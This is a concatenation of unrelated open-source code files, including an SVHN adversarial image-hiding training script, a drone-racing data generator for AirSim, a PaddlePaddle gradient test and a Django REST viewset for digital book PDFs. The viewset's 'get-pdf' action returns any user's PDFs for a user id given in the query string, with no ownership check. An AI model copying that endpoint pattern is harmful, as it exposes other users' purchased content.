plt.clf()\n plt.plot(attloss_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/attlossCurve.png'.format(outputname)) \n\n plt.clf()\n plt.plot(loss_cover_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/coverlossCurve.png'.format(outputname)) \n\n\ndef save_checkpoint(state, filename):\n checkpointname = filename+'_checkpoint.pth.tar'\n torch.save(state, checkpointname)\n\ndef train_model(train_loader, beta, learning_rate):\n \n\n # Iterate over batches performing forward and backward passes\n train_loss_secret_history = []\n attloss_history = []\n loss_cover_history = [] \n \n outputname = 'svhn_train'\n \n print(outputname)\n if not 
os.path.exists(outputname):\n os.mkdir(outputname)\n best_val_psnr_secret = -1\n best_val_psnr_sc = 10000\n vallabel =['MSE','PSNR','SSIM','APE','LIPIPS','PSNR_c','SSIM_c','LIPIPS_c','MSE_c']\n l2loss_secret_history = []\n # Iterate over batches performing forward and backward passes\n psnr_secret_history = []\n ssim_secret_history = []\n mean_pixel_error_history = [] \n lpips_error_history = []\n psnr_sc_history =[]\n ssim_sc_history =[]\n lpips_sc_history=[]\n mse_sc_history =[]\n for epoch in range(num_epochs):\n\n # Train mode\n\n train_losses = []\n # Train one epoch\n cover_succ = 0\n for idx, train_batch in enumerate(train_loader):\n \n net.train()\n train_secrets, labels = train_batch\n train_secrets = train_secrets.to(device)\n \n labels = labels.to(device)\n train_covers,succ = getAdvZ(imgsize,labels,batch_size,len(train_secrets))\n cover_succ+= int(succ)\n print(\"epo:{} att z succ rate:{}\".format(epoch,cover_succ/((idx+1)*batch_size)))\n\n train_secrets = Variable(train_secrets, requires_grad=False)\n train_covers = Variable(train_covers, requires_grad=False)\n\n \n # Forward + Backward + Optimize\n \n optimizer.zero_grad()\n mix_img,recover_secret = net(train_secrets,train_covers) # to be [-1,1]\n \n train_loss, train_loss_secret,attloss,loss_cover = attack1_loss(recover_secret,mix_img, train_secrets,train_covers,beta,labels)\n #show\n\n if (idx+1)%print_freq == 0 or idx==1:\n toshow = torch.cat((train_secrets[:4]*_std_torch+_mean_torch,train_covers[:4],mix_img[:4],recover_secret[:4]),dim=0)\n imgg = make_grid(toshow,nrow=nrow_)\n save_image(imgg,'{}/{}_{}.png'.format(outputname,epoch,idx),normalize=False)\n \n plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch)\n \n\n train_loss.backward()\n optimizer.step()\n \n # Saves training loss\n train_losses.append(float(train_loss.data))\n train_loss_secret_history.append(float(train_loss_secret.data))\n attloss_history.append(float(attloss.data))\n loss_cover_history.append(float(loss_cover.data))\n # Prints mini-batch losses\n print('Training: Batch {0}/{1}. 
Loss of {2:.4f},secret loss of {3:.4f}, attack1_loss of {4:.4f}, loss_cover {5:.5f}'.format(idx+1, len(train_loader), train_loss.data, train_loss_secret.data,attloss.data,loss_cover))\n \n \n \n\n if (epoch==0 or (epoch+1)%20==0):\n modelsavepath ='output/svhn/Epoch_{}_{}_latest'.format(epoch,outputname)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': net.state_dict(),\n 'optimizer' : optimizer.state_dict()},modelsavepath)\n \n mean_train_loss = np.mean(train_losses)\n \n # Prints epoch average loss\n print ('Epoch [{0}/{1}], Average_loss: {2:.4f}'.format(\n epoch+1, num_epochs, mean_train_loss))\n plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch) \n \n \n return net,mean_train_loss\n\n\ndef convert1(img):\n img = img * 255.0\n img = img.permute(0, 2, 3, 1).cpu().detach().numpy()\n return img\n\n\ndef test():\n \n \n MODELS_PATH = '../Weights/Svhn.pth.tar'\n net.eval()\n load_checkpoint(MODELS_PATH)\n \n total = 0\n acctotal = 0\n l2loss_secrets = 0 \n l2loss_covers = 0 \n psnr_secrets =0 \n ssim_secrets =0 \n cover_succ=0\n mean_pixel_errors =0 \n total_all = 0\n lpips_errors,lpips_scs,mse_scs,psnr_scs,ssim_scs = 0.,0.,0.,0.,0.\n \n outputname=\"svhn_test\" \n if not os.path.exists(outputname):\n os.mkdir(outputname)\n \n for idx, train_batch in enumerate(test_loader):\n\n train_secrets, labels = train_batch\n train_secrets = train_secrets.to(device)\n total_all += train_secrets.shape[0]\n if total_all<=1000:\n continue\n if total_all>1500:\n break\n total += train_secrets.shape[0]\n\n labels = labels.to(device)\n\n \n train_covers,succ = getAdvZ(imgsize,labels,batch_size,len(train_secrets))\n \n # Creates variable from secret and cover images\n train_secrets = Variable(train_secrets, requires_grad=False)\n train_covers = Variable(train_covers, requires_grad=False)\n\n\n \n mix_img,recover_secret = net(train_secrets,train_covers,train=False) # to be [-1,1]\n\n acc_num, l2loss_secret,l2loss_cover,psnr_secret,ssim_secret,mean_pixel_error,lpips_error,lpips_sc,mse_sc,psnr_sc,ssim_sc= \\\n valmetric(recover_secret,mix_img, train_secrets,train_covers,beta,labels)\n acctotal += int(acc_num)\n l2loss_secrets += float(l2loss_secret)\n l2loss_covers += float(l2loss_cover)\n psnr_secrets += float(psnr_secret)\n ssim_secrets += float(ssim_secret)\n mean_pixel_errors += float(mean_pixel_error)\n lpips_errors += float(lpips_error)\n lpips_scs += float(lpips_sc)\n mse_scs += float(mse_sc)\n psnr_scs += float(psnr_sc)\n ssim_scs += float(ssim_sc)\n\n print(\"attack success rate:{}/{}={:.6f}\".format(acctotal,total,acctotal/total))\n print(\"avg. l2loss_secrets:{:.6f}\".format(l2loss_secrets/total))\n print(\"avg. l2loss_covers:{:.6f}\".format(l2loss_covers/total))\n print(\"avg. psnr_secrets:{:.6f}\".format(psnr_secrets/total))\n print(\"avg. ssim_secrets:{:.6f}\".format(ssim_secrets/total))\n print(\"avg. mean_pixel_errors:{:.6f}\".format(mean_pixel_errors/total))\n print(\"avg. lpips_errors:{:.6f}\".format(lpips_errors/total))\n print(\"avg. lpips_scs:{:.6f}\".format(lpips_scs/total))\n print(\"avg. mse_scs:{:.6f}\".format(mse_scs/total))\n print(\"avg. psnr_scs:{:.6f}\".format(psnr_scs/total))\n print(\"avg. 
ssim_scs:{:.6f}\".format(ssim_scs/total))\n \n diff = mix_img-train_covers\n diff = (diff-torch.min(diff))/(torch.max(diff)-torch.min(diff))\n toshow = torch.cat((train_secrets[:4]*_std_torch+_mean_torch,train_covers[:4],mix_img[:4],recover_secret[:4],diff[:4]),dim=0)\n imgg = make_grid(toshow,nrow=nrow_)\n save_image(imgg,'{}/{}.png'.format(outputname,idx),normalize=False)\n\n print(\"finished.\")\n\n\n\nif __name__ == \"__main__\":\n\n stage = \"test\" # or train\n\n cwd = os.getcwd()\n # Hyper Parameters\n num_epochs = 200\n #batch_size = 512\n batch_size =64\n batch_size_test = 10\n print_freq = 50\n val_freq = 50\n nrow_ = 4\n learning_rate = 0.0001\n beta = 10\n print(\"beta : {}\".format(beta))\n imgsize=32\n\n \n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n target_model, ds_fetcher, is_imagenet = selector.select('svhn') #labels: 0 means digit 1, ..., 9 means digit 10\n target_model.eval().to(device)\n kappa = 5\n\n modellp = PerceptualSimilarity.models.PerceptualLoss(model='net-lin', net='alex', use_gpu=True, gpu_ids=[0])\n\n residual_en = True\n residual_de = True\n lambda_net = 0.8\n print(\"encoder residual learning:{}; decoder:{}, lambda_net:{}\".format(residual_en,residual_de,lambda_net))\n\n net = Net(residual_en,residual_de,lambda_net)\n net = torch.nn.DataParallel(net).cuda()\n optimizer = optim.Adam(net.parameters(), lr=learning_rate)\n \n\n train_loader = ds_fetcher(batch_size=batch_size,train=True,val=False)\n # # Creates test set\n test_loader = ds_fetcher(batch_size=batch_size_test,train=False,val=True) # since batch_size=32 was used during training, the first 1024 samples served as val; just use the later ones for test\n \n _mean_torch = torch.tensor((0.5, 0.5, 0.5)).view(3,1,1).to(device)\n _std_torch = torch.tensor((0.5, 0.5, 0.5)).view(3,1,1).to(device)\n\n if stage == \"test\":\n test()\n elif stage == \"train\":\n net, mean_train_loss = train_model(train_loader, beta, learning_rate)\n","repo_name":"csjunjun/RIC","sub_path":"SVHN.py","file_name":"SVHN.py","file_ext":"py","file_size_in_byte":14372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"70341122639","text":"#!/usr/bin/env python\n\n__author__ = 'jsommers@colgate.edu'\n\nfrom flowexporter import FlowExporter\n\nclass TextExporter(FlowExporter):\n '''Export flowlets to a simple text format'''\n def __init__(self, rname, bufsize=500):\n FlowExporter.__init__(self, rname)\n outname = self.routername + '_flow.txt'\n self.outfile = open(outname, 'wb')\n self.buffer = []\n self.bufsize = bufsize\n\n def _flush_buffer(self):\n self.outfile.write(''.join(self.buffer))\n self.buffer = []\n\n def shutdown(self):\n self._flush_buffer()\n self.outfile.close()\n\n def exportflow(self, ts, flet):\n record = 'textexport %s %0.06f %s\\n' % (self.routername, ts, str(flet))\n self.buffer.append(record)\n if len(self.buffer) >= self.bufsize:\n self._flush_buffer()\n \n","repo_name":"jsommers/fs","sub_path":"flowexport/textexport.py","file_name":"textexport.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"29"} +{"seq_id":"75175019277","text":"from CH4_Trees_and_Graphs.TreeNode import TreeNode\n# Also this is question no 108 at LeetCode\n\nsorted_list = [0,1,2,3,4,5,6,7,8,9,10]\n\n\ndef in_order(head):\n if not head:\n return\n in_order(head.left)\n print(head.val)\n in_order(head.right)\n\ndef construct_tree(start, end):\n mid_index = int((start + end) / 2)\n head = TreeNode(sorted_list[mid_index])\n if mid_index != start:\n 
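# recurse on the left half only when elements remain below the midpoint;
# picking the middle element as the root splits the sorted list evenly,
# which is what keeps the resulting BST at minimum height (for the
# sorted_list above, the root is 5 and its children are 2 and 8)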
head.left = construct_tree(start, mid_index-1)\n if mid_index != end:\n head.right = construct_tree(mid_index+1, end)\n\n return head\n\nstart = 0\nend = len(sorted_list) - 1\n\nin_order(construct_tree(start, end))","repo_name":"CoderKn1ght/Algorithm-Implementations","sub_path":"CH4_Trees_and_Graphs/q2_sorted_list_into_binary_tree_with_minimum_height.py","file_name":"q2_sorted_list_into_binary_tree_with_minimum_height.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38986929214","text":"from __future__ import division\nimport random\nimport math\nimport time\nimport numpy as np\nimport threading\nimport os, sys\nimport airsimdroneracingvae\nimport airsimdroneracingvae.types\nimport airsimdroneracingvae.utils\nfrom pynput.keyboard import Key, Controller\n\nkeyboard = Controller()\nkey = \"r\"\n\n# import utils\ncurr_dir = os.path.dirname(os.path.abspath(__file__))\nimport_path = os.path.join(curr_dir, '..', '..')\nsys.path.insert(0, import_path)\nimport racing_utils\nimport Extractor\n\nrandom.seed()\n\n# DEFINE DATA GENERATION META PARAMETERS\ngate_passed_threshold = 0.8\nviz_traj = False\nvel_max = 8.0\nacc_max = 30.0\nspeed_through_gate = 2.8\nnum_of_labs = 5\nrecord = True\n\n\nclass DroneRacingDataGenerator(object):\n def __init__(self,\n drone_name,\n odom_loop_rate_sec,\n vel_max,\n acc_max):\n self.odom_loop_rate_sec = odom_loop_rate_sec\n self.base_track = None\n self.track_gate_poses = None\n self.num_training_laps = None\n self.next_gate_idx = 0\n self.last_gate_passed = -1\n self.Dists = None\n self.velocities = []\n # should be same as settings.json\n self.gate_names = []\n self.drone_name = drone_name\n self.track_name = 'tracks/interpolated_8.csv'\n self.last_future = []\n self.start_end = 0.0\n self.passed = True\n self.tic = 0\n self.record_flag = 0\n self.timer_flag = 0\n self.lab = 0\n # training params\n self.vel_max = vel_max\n self.acc_max = acc_max\n self.traj_tracker_gains = airsimdroneracingvae.TrajectoryTrackerGains(kp_cross_track=5.0, kd_cross_track=0.0,\n kp_vel_cross_track=3.0,\n kd_vel_cross_track=0.0,\n kp_along_track=0.4, kd_along_track=0.0,\n kp_vel_along_track=0.04,\n kd_vel_along_track=0.0,\n kp_z_track=2.0, kd_z_track=0.0,\n kp_vel_z=0.4, kd_vel_z=0.0,\n kp_yaw=3.0, kd_yaw=0.1)\n # todo encapsulate in function\n self.client = airsimdroneracingvae.MultirotorClient()\n self.client.confirmConnection()\n time.sleep(0.05)\n\n # threading stuff\n self.got_odom = False\n self.is_velocity_thread_active = True\n self.is_expert_planner_controller_thread_active = True\n\n def initialize_quadrotor(self):\n self.client.enableApiControl(True, vehicle_name=self.drone_name)\n time.sleep(0.01)\n self.client.armDisarm(True, vehicle_name=self.drone_name)\n time.sleep(0.01)\n self.client.setTrajectoryTrackerGains(self.traj_tracker_gains.to_list(),\n vehicle_name=self.drone_name)\n time.sleep(0.01)\n\n self.takeoff_with_moveOnSpline(x=57, y=6, z=-14, vel_max=self.vel_max, acc_max=5)\n time.sleep(2)\n\n def start_training_data_generator(self, level_name='Soccer_Field_Easy'):\n # Environment Initialization\n self.load_level(level_name)\n open_track = Extractor.ReadGates(self.track_name)\n closing = Extractor.ReadGates('tracks/Closing_8.csv')\n self.base_track = open_track + closing\n self.track_gate_poses = Extractor.DistortCheckeredGates(self.base_track, -0.8, 0.8)\n self.gate_names = self.name_the_gates(len(self.track_gate_poses))\n self.Dists, self.start_end = 
Extractor.Get_Distances_between_Gates(self.track_gate_poses)\n # print(self.Dists)\n self.create_track('CheckeredDroneGate16x16', self.track_gate_poses, 1)\n # Drone Initialization\n self.initialize_quadrotor()\n\n # Generation\n\n if record and self.record_flag == 0:\n keyboard.press(key)\n keyboard.release(key)\n self.record_flag = 1\n\n while self.lab <= num_of_labs:\n self.expert_planner_controller_callback()\n\n if record and self.lab > num_of_labs:\n keyboard.press(key)\n keyboard.release(key)\n\n def repeat_timer_expert(self, task, period):\n while self.is_expert_planner_controller_thread_active:\n task()\n time.sleep(period)\n\n def repeat_timer_vel(self, task, period):\n while self.is_velocity_thread_active:\n task()\n time.sleep(period)\n\n def load_level(self, level_name):\n ''' Loads an empty Environment '''\n self.client.simLoadLevel(level_name)\n time.sleep(2)\n racing_utils.AllGatesDestroyer(self.client)\n\n def create_track(self, gate_type, gate_poses, scale):\n ''' Creates a track '''\n for i, poses in enumerate(gate_poses):\n self.client.simSpawnObject(self.gate_names[i], gate_type,\n poses, scale)\n time.sleep(0.05)\n\n def name_the_gates(self, num_gates_track):\n names = []\n for i in range(num_gates_track):\n name = 'Gate_' + str(i)\n names.append(name)\n return names\n\n def takeoff_with_moveOnSpline(self, x, y, z, vel_max, acc_max):\n self.client.moveOnSplineAsync(path=[airsimdroneracingvae.Vector3r(x, y, z)],\n vel_max=vel_max, acc_max=acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name).join()\n\n def expert_planner_controller_callback(self):\n\n if self.next_gate_idx == 1 and self.timer_flag == 0:\n self.tic = time.perf_counter()\n self.timer_flag = 1\n self.lab += 1\n\n if self.next_gate_idx == len(self.track_gate_poses):\n toc = time.perf_counter()\n print('Finished lab ' + str(self.lab))\n print('lab Time:', toc - self.tic)\n print('lab max velocity = ', np.max(self.velocities))\n print('lab average velocity = ', np.mean(self.velocities))\n self.last_gate_passed = -1\n self.next_gate_idx = 0\n self.timer_flag = 0\n time.sleep(2)\n self.track_gate_poses = Extractor.DistortCheckeredGates(self.base_track, -0.8, 0.8)\n for gate_idx in range(len(self.track_gate_poses)):\n self.client.simSetObjectPose(self.gate_names[gate_idx], self.track_gate_poses[gate_idx])\n\n if self.passed:\n self.fly_to_next_gate_with_moveOnSpline(self.next_gate_idx)\n\n self.passed = self.simGetLastGatePassed()\n\n def fly_to_next_gate_with_moveOnSpline(self, next_gate_idx):\n gates_to_limit1 = [len(self.track_gate_poses) - 1, len(self.track_gate_poses) - 2,\n len(self.track_gate_poses) - 3, 0]\n gates_to_limit2 = [46, 47, 48]\n if self.next_gate_idx in gates_to_limit1 and self.lab > 0:\n v_max = 6\n elif self.next_gate_idx < 50 and self.next_gate_idx > 45:\n v_max = 5\n elif self.next_gate_idx < 39 and self.next_gate_idx > 10:\n v_max = 5.5\n else:\n v_max = self.vel_max\n\n self.last_future.append(\n self.client.moveOnSplineVelConstraintsAsync([self.track_gate_poses[next_gate_idx].position],\n [self.get_gate_facing_vector_from_quaternion(\n self.track_gate_poses[next_gate_idx].orientation,\n scale=speed_through_gate)],\n vel_max=v_max, acc_max=self.acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name))\n\n velocity_com = self.client.simGetGroundTruthKinematics(self.drone_name).linear_velocity\n 
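# record the drone's current speed (magnitude of the ground-truth linear
# velocity) so the per-lap max/mean printed at lap end cover this leg;
# a minimal sketch of the same computation, using a hypothetical helper
# that is not part of this class:
#   def speed(v):  # v exposes x_val / y_val / z_val components
#       return math.sqrt(v.x_val ** 2 + v.y_val ** 2 + v.z_val ** 2)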
self.velocities.append(math.sqrt(velocity_com.x_val ** 2 + velocity_com.y_val ** 2 + velocity_com.z_val ** 2))\n\n def fly_to_next_gate_with_moveOnSpline_No_Deacc(self, next_gate_idx):\n self.last_future.append(\n self.client.moveOnSplineAsync([self.track_gate_poses[next_gate_idx].position],\n vel_max=self.vel_max, acc_max=self.acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name))\n\n def velocity_calculator_callback(self):\n velocity_com = self.client.simGetGroundTruthKinematics(self.drone_name).linear_velocity\n self.velocities.append(math.sqrt(velocity_com.x_val ** 2 + velocity_com.y_val ** 2 + velocity_com.z_val ** 2))\n print(self.velocities)\n\n def synchronize(self, next_gate_idx):\n if next_gate_idx == 0:\n time.sleep(2.2)\n print('yes')\n if self.track_name == 'Qualifier_Tier_3.csv':\n if next_gate_idx == 12 or next_gate_idx == 11:\n time.sleep(0.22 * self.Dists[next_gate_idx - 1])\n elif next_gate_idx == 8:\n time.sleep(0.45 * self.Dists[next_gate_idx - 1])\n else:\n time.sleep(0.26 * self.Dists[next_gate_idx - 1])\n else:\n sleep_time = (10 ** (self.Dists[next_gate_idx - 1] / 2.5 + 1)) * math.exp(-self.Dists[next_gate_idx - 1])\n print(sleep_time)\n time.sleep(sleep_time)\n\n def simGetLastGatePassed(self):\n drone_position = self.client.simGetGroundTruthKinematics().position\n dist_from_curr_gate = math.sqrt(\n (drone_position.x_val - self.track_gate_poses[self.next_gate_idx].position.x_val) ** 2\n + (drone_position.y_val - self.track_gate_poses[self.next_gate_idx].position.y_val) ** 2\n + (drone_position.z_val - self.track_gate_poses[self.next_gate_idx].position.z_val) ** 2)\n\n if dist_from_curr_gate < gate_passed_threshold:\n self.last_gate_passed += 1\n self.next_gate_idx += 1\n return True\n\n # def Finish(self):\n\n # maybe maintain a list of futures, or else unreal binary will crash if join() is not called at the end of script\n\n def join_all_pending_futures(self):\n for i in range(len(self.track_gate_poses)):\n self.last_future[i].join()\n\n def start_expert_planner_controller_thread(self):\n if not self.is_expert_planner_controller_thread_active:\n self.is_expert_planner_controller_thread_active = True\n self.expert_planner_controller_thread.start()\n print(\"Started expert_planner_controller thread\")\n\n def stop_expert_planner_controller_thread(self):\n if self.is_expert_planner_controller_thread_active:\n self.is_expert_planner_controller_thread_active = False\n # self.expert_planner_controller_thread.join()\n print(\"Stopped expert_planner_controller thread\")\n\n def set_num_training_laps(self, num_training_laps):\n self.num_training_laps = num_training_laps\n\n def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale=1):\n # convert gate quaternion to rotation matrix.\n # ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html\n q = np.array([airsim_quat.w_val, airsim_quat.x_val, airsim_quat.y_val, airsim_quat.z_val], dtype=np.float64)\n n = np.dot(q, q)\n if n < np.finfo(float).eps:\n return airsimdroneracingvae.Vector3r(0.0, 1.0, 0.0)\n q *= np.sqrt(2.0 / n)\n q = np.outer(q, q)\n rotation_matrix = np.array([[1.0 - q[2, 2] - q[3, 3], q[1, 2] - q[3, 0], q[1, 3] + q[2, 0]],\n [q[1, 2] + q[3, 0], 1.0 - q[1, 1] - q[3, 3], q[2, 3] - q[1, 0]],\n [q[1, 3] - q[2, 0], q[2, 3] + q[1, 0], 1.0 - q[1, 1] - q[2, 2]]])\n gate_facing_vector = rotation_matrix[:, 1]\n return 
airsimdroneracingvae.Vector3r(scale * gate_facing_vector[0], scale * gate_facing_vector[1],\n scale * gate_facing_vector[2])\n\n\nif __name__ == \"__main__\":\n drone_racing_datagenerator = DroneRacingDataGenerator(drone_name='drone_0',\n odom_loop_rate_sec=0.005,\n vel_max=vel_max,\n acc_max=acc_max\n )\n drone_racing_datagenerator.start_training_data_generator()\n","repo_name":"Mohamed-Omran/Autonomous-Drone-Racing-with-Airsim","sub_path":"datagen/action_generator/Race_Expert.py","file_name":"Race_Expert.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"30900988364","text":"from rest_framework import viewsets\nfrom .models import DigitalBookPDF\nfrom .serializers import DigitalBookPDFSerializer\nfrom rest_framework.decorators import action\nfrom users.models import User\nfrom users.serializers import UserSerializer\nfrom digital_books.models import Digital_Book\nfrom rest_framework.response import Response\nfrom adquisitions.models import Collection\nfrom adquisitions.serializers import CollectionSerializer\n\nfrom permissions.services import APIPermissionClassFactory\n\ndef is_admin(user, request):\n return user.is_admin == True\n\ndef is_logged(user, obj, request):\n return user.email == obj.email\n\nclass DigitalBookPDFViewSet(viewsets.ModelViewSet):\n queryset = DigitalBookPDF.objects.all()\n serializer_class = DigitalBookPDFSerializer\n\n permission_classes = (\n APIPermissionClassFactory(\n name='UserPermission',\n permission_configuration={\n 'base': {\n 'create': is_admin,\n 'list': True,\n },\n 'instance': {\n 'retrieve': is_logged,\n 'destroy': False,\n 'update': False,\n 'get_pdf': is_logged,\n }\n }\n ),\n )\n\n @action(detail=False, url_path='get-pdf', methods=['get'])\n def get_pdf(self, request):\n user_id = request.query_params['user']\n user = User.objects.get(pk=user_id)\n collection = Collection.objects.filter(user=user)\n pdf = []\n for book in collection:\n try:\n digitalBookPdf = DigitalBookPDF.objects.get(book=book.book)\n pdf.append(DigitalBookPDFSerializer(digitalBookPdf).data)\n \n except DigitalBookPDF.DoesNotExist:\n pass\n \n return Response(pdf)\n #api/v1/digital-books-pdf/get-pdf/?user=#\n\n","repo_name":"amado-developer/ReadHub-RestfulAPI","sub_path":"digitalBooksPDF/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36030654181","text":"import unittest\n\nimport numpy as np\nimport parameterized as param\n\nimport paddle\nfrom paddle.base import core, framework\n\nnp.random.seed(2023)\n\n\ndef apply_to_static(net, use_cinn):\n build_strategy = paddle.static.BuildStrategy()\n build_strategy.build_cinn_pass = use_cinn\n return paddle.jit.to_static(net, build_strategy=build_strategy)\n\n\nclass PrimeNet(paddle.nn.Layer):\n def __init__(self):\n super().__init__()\n self.fc = paddle.nn.Linear(4, 4)\n\n def forward(self, x, index, axis):\n tmp = self.fc(x)\n out = paddle.gather(tmp, index, axis)\n return out\n\n\n@param.parameterized_class(\n ('primal0', 'index', 'axis', 'x_dtype', 'index_dtype', 'v', \"count\"),\n [\n (\n np.random.rand(100),\n np.array([1, 3, 5]),\n 0,\n np.float32,\n np.int32,\n np.random.rand(3),\n 0,\n ),\n (\n np.random.rand(10, 20),\n np.array([1, 3, 5]),\n 0,\n np.float64,\n np.int64,\n np.random.rand(3, 20),\n 1,\n ),\n (\n np.random.rand(10, 20),\n np.array([1, 1, 3]),\n 0,\n np.float32,\n 
np.int32,\n np.random.rand(3, 20),\n 2,\n ),\n (\n # Something wrong with gather grad cpu kernel\n np.random.rand(3, 88, 30),\n np.array([1, 3, 5]),\n 1,\n np.float32,\n np.int32,\n np.random.rand(3, 3, 30),\n 3,\n ),\n (\n np.random.rand(10, 88, 10),\n np.array([1, 3, 5]),\n 0,\n np.float16,\n np.int32,\n np.random.rand(3, 88, 10),\n 4,\n ),\n ],\n)\nclass TestGatherGradComp(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.primal0 = cls.primal0.astype(cls.x_dtype)\n cls.index = cls.index.astype(cls.index_dtype)\n cls.v = cls.v.astype(cls.x_dtype)\n\n def train(self, use_prim, use_cinn):\n paddle.seed(2022)\n self.x = paddle.randn([2, 4])\n self.index = paddle.to_tensor(np.array([0, 1]))\n self.x.stop_gradient = False\n net = PrimeNet()\n core._set_prim_backward_enabled(use_prim)\n net = apply_to_static(net, use_cinn)\n out = net(self.x, self.index, 0)\n res = paddle.autograd.grad(out, [self.x])\n\n return res\n\n def test_cinn(self):\n paddle.disable_static()\n use_cinn = True\n if isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n ):\n # TODO(jiabin): CINN will crashed in this case open it when fixed\n use_cinn = False\n dy_res = self.train(use_prim=False, use_cinn=False)\n\n comp_st_cinn_res = self.train(use_prim=True, use_cinn=use_cinn)\n\n for i in range(len(dy_res)):\n np.testing.assert_allclose(\n comp_st_cinn_res[i].numpy(),\n dy_res[i].numpy(),\n rtol=1e-6,\n atol=1e-6,\n )\n paddle.enable_static()\n\n def test_tanh_grad_comp(self):\n paddle.enable_static()\n\n def actual(primal0, index, axis, v):\n core._set_prim_backward_enabled(True)\n mp, sp = paddle.static.Program(), paddle.static.Program()\n with paddle.static.program_guard(mp, sp):\n x = paddle.static.data('primal0', primal0.shape, primal0.dtype)\n index_tmp = paddle.static.data(\n 'index', index.shape, index.dtype\n )\n x.stop_gradient = False\n index_tmp.stop_gradient = True\n z = paddle.gather(x, index_tmp, axis)\n z_grad = paddle.static.data('v', z.shape, z.dtype)\n res = paddle.static.gradients([z], [x], [z_grad])\n exe = paddle.static.Executor()\n exe.run(sp)\n out = exe.run(\n program=mp,\n feed={\n 'primal0': primal0,\n 'index': index,\n 'v': v,\n },\n fetch_list=[res[0].name],\n )\n return out[0]\n\n def desired(primal0, index, axis, v):\n core._set_prim_backward_enabled(False)\n mp, sp = paddle.static.Program(), paddle.static.Program()\n with paddle.static.program_guard(mp, sp):\n x = paddle.static.data('primal0', primal0.shape, primal0.dtype)\n index_tmp = paddle.static.data(\n 'index', index.shape, index.dtype\n )\n x.stop_gradient = False\n index_tmp.stop_gradient = True\n z = paddle.gather(x, index_tmp, axis)\n z_grad = paddle.static.data('v', z.shape, z.dtype)\n res = paddle.static.gradients([z], [x], [z_grad])\n exe = paddle.static.Executor()\n exe.run(sp)\n out = exe.run(\n program=mp,\n feed={\n 'primal0': primal0,\n 'index': index,\n 'v': v,\n },\n fetch_list=[res[0].name],\n )\n return out[0]\n\n dx = None\n ddx = None\n\n # fp16 is not supported for cpu gather\n if not (\n (self.count == 4)\n and isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n )\n ):\n dx = actual(self.primal0, self.index, self.axis, self.v)\n\n ddx = desired(self.primal0, self.index, self.axis, self.v)\n\n if (self.count >= 3) and isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n ):\n # Scatter in phi has problem with cpu kernel of case 4, so skip this\n pass\n elif (self.count == 4) and (\n not isinstance(\n 
framework._current_expected_place(), framework.core.CPUPlace\n )\n ):\n # FP16 test case\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-3,\n atol=0,\n )\n elif self.count == 1:\n # FP64 test case\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-15,\n atol=1e-15,\n )\n else:\n # FP32 test cases\n np.testing.assert_allclose(\n actual=dx,\n desired=ddx,\n rtol=1e-5,\n atol=0,\n )\n core._set_prim_backward_enabled(False)\n paddle.disable_static()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/prim/prim/vjp/static/test_comp_gather_grad.py","file_name":"test_comp_gather_grad.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"36476739496","text":"import time\nimport cv2\nimport sys\nimport numpy as np\nimport argparse\nimport os\nfrom utils import image_utils\nfrom utils import compare\nfrom utils.model_utils import vehicleDetector\nfrom sort import Sort\nfrom kalman_tracker import KalmanBoxTracker\nimport config\nfrom shapely.geometry.polygon import Polygon\n\nif \"Tkinter\" not in sys.modules:\n import tkinter as tk\n from tkinter import *\n from tkinter import messagebox\n from tkinter.filedialog import askopenfilename\n from tkinter.filedialog import askdirectory\nfrom PIL import ImageTk, Image\n\nIn = False\nVid_path = None\nOut_path = None\nldvar = False\nplayvar = False\nm_width = 1000\nm_height = 600\n\n# Function to set focus\ndef focus1(event): \n # set focus on the dur_field box \n dur_field.focus_set() \n \ndef focus2(event): \n # set focus on the std_field box \n std_field.focus_set()\n\ndef focus3(event): \n # set focus on the thresh_field box \n thresh_field.focus_set()\n\ndef input_path():\n global In\n global Vid_path\n In = True\n Vid_path = askopenfilename()\n print(Vid_path)\n \n\ndef output_path():\n global Out_path\n Out_path = askdirectory()\n # print(Out_path)\n\ndef playen():\n global playvar\n playvar = True\n\ndef loadmodel():\n global In\n global Vid_path\n global Out_path\n global vs\n global tracker\n global model \n global W\n global H\n global ldvar\n global result\n global ratio\n \n if In and thresh_field.get() != \"\" and dur_field.get() != \"\" and std_field.get() != \"\":\n \n inputFile = Vid_path\n vs = cv2.VideoCapture(inputFile)\n fps = 